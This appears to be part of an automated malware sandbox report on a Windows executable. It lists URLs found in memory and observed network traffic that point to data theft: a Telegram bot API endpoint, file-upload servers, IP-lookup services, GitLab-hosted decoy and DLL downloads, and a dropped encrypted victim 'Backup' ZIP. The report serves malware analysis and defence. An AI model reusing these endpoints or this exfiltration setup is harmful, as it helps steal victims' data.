      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E02B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com:443/p
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E1C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/y
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E1C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/p
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1584069385.0000025112145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.o
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: hJ1bl8p7dJ.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/binaryformatter
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/dotnet-illink/com
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/servers
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/efcore
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/runtime
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawd
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1187
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1416.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1906.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1981
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/2025
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/pull/2125.
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp, ConDrv.0.drString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://www.sqlite.org/rescode.html
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.11:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:50005 version: TLS 1.2

      System Summary

      barindex
      Drops password protected ZIP file
      Source: Backup_[United States]_8.46.123.189_[1401].zip.0.drZip Entry: encrypted
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1BDF400_2_00007FFEEE1BDF40
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1F4FE00_2_00007FFEEE1F4FE0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1045100_2_00007FFEEE104510
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B25700_2_00007FFEEE1B2570
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE19F5D00_2_00007FFEEE19F5D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE14AEA00_2_00007FFEEE14AEA0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12AE900_2_00007FFEEE12AE90
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE155EE00_2_00007FFEEE155EE0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE138EF00_2_00007FFEEE138EF0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE17FEF00_2_00007FFEEE17FEF0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE17CF200_2_00007FFEEE17CF20
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1A3F880_2_00007FFEEE1A3F88
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1E8F800_2_00007FFEEE1E8F80
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE162FD00_2_00007FFEEE162FD0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1100100_2_00007FFEEE110010
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1A7CB00_2_00007FFEEE1A7CB0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1D0CB00_2_00007FFEEE1D0CB0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B4C900_2_00007FFEEE1B4C90
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE164CE00_2_00007FFEEE164CE0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12DCD00_2_00007FFEEE12DCD0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1DACD00_2_00007FFEEE1DACD0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE19CD0F0_2_00007FFEEE19CD0F
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE173D700_2_00007FFEEE173D70
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE15FDB00_2_00007FFEEE15FDB0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE19CD820_2_00007FFEEE19CD82
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE19CDCA0_2_00007FFEEE19CDCA
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE229DC00_2_00007FFEEE229DC0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE236E300_2_00007FFEEE236E30
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE158E200_2_00007FFEEE158E20
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12BE100_2_00007FFEEE12BE10
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE190A600_2_00007FFEEE190A60
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE199AB00_2_00007FFEEE199AB0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE132A900_2_00007FFEEE132A90
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE10AAE60_2_00007FFEEE10AAE6
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE134B200_2_00007FFEEE134B20
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE138B600_2_00007FFEEE138B60
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE10FBB00_2_00007FFEEE10FBB0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE108BF00_2_00007FFEEE108BF0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE13FBD00_2_00007FFEEE13FBD0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE102BE00_2_00007FFEEE102BE0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1D7C200_2_00007FFEEE1D7C20
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE13A8A00_2_00007FFEEE13A8A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B58B00_2_00007FFEEE1B58B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE10B9300_2_00007FFEEE10B930
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1369120_2_00007FFEEE136912
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1AD9400_2_00007FFEEE1AD940
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1889800_2_00007FFEEE188980
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1569D00_2_00007FFEEE1569D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE177A300_2_00007FFEEE177A30
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B7A300_2_00007FFEEE1B7A30
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE127A000_2_00007FFEEE127A00
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1DFA100_2_00007FFEEE1DFA10
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1476600_2_00007FFEEE147660
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE18B6600_2_00007FFEEE18B660
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE16C6500_2_00007FFEEE16C650
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2186B00_2_00007FFEEE2186B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1696B00_2_00007FFEEE1696B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1BB6B00_2_00007FFEEE1BB6B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1C66900_2_00007FFEEE1C6690
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1836E00_2_00007FFEEE1836E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE18D6E00_2_00007FFEEE18D6E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1746C00_2_00007FFEEE1746C0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE16B7600_2_00007FFEEE16B760
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1C47700_2_00007FFEEE1C4770
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE18E7700_2_00007FFEEE18E770
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE10A7460_2_00007FFEEE10A746
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE15A7A00_2_00007FFEEE15A7A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12A7F00_2_00007FFEEE12A7F0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12D7F00_2_00007FFEEE12D7F0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1797F00_2_00007FFEEE1797F0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1F57F00_2_00007FFEEE1F57F0
